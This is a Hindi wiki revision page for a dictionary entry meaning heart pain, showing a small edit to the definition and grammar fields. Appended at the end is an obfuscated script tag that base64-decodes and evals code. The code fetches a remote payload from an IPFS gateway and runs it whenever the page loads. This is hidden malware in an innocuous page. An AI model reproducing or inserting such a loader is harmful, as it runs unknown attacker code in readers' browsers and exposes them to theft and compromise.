Difference between revisions of "हृच्छूल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{शब्द संदर्भ लघु |हिन्दी=हृदय का दर्द, छाती के नीचेव...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
{{शब्द संदर्भ लघु
 
{{शब्द संदर्भ लघु
|हिन्दी=[[हृदय]] का दर्द, छाती के नीचेवाले भाग में होनेवाली एक प्रकार की बहुत भीषण और विकट पीड़ा, जिससे रोगी का दम घुटने लगता है।
+
|हिन्दी=[[हृदय]] का दर्द, शूल, छाती के नीचेवाले भाग में होनेवाली एक प्रकार की बहुत भीषण और विकट पीड़ा, जिससे रोगी का दम घुटने लगता है।
|व्याकरण=पुल्लिंग- शूल
+
|व्याकरण=पुल्लिंग।
 
|उदाहरण=
 
|उदाहरण=
 
|विशेष=
 
|विशेष=

Revision as of 04:26, 16 January 2011

shabd sandarbh
hindi hriday ka dard, shool, chhati ke nichevale bhag mean honevali ek prakar ki bahut bhishan aur vikat pi da, jisase rogi ka dam ghutane lagata hai.
-vyakaran    pulliang.
-udaharan  
-vishesh   
-vilom   
-paryayavachi   
sanskrit [hrit- hriday+shool]
any granth
sanbandhit shabd
sanbandhit lekh

any shabdoan ke arth ke lie dekhean shabd sandarbh kosh
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>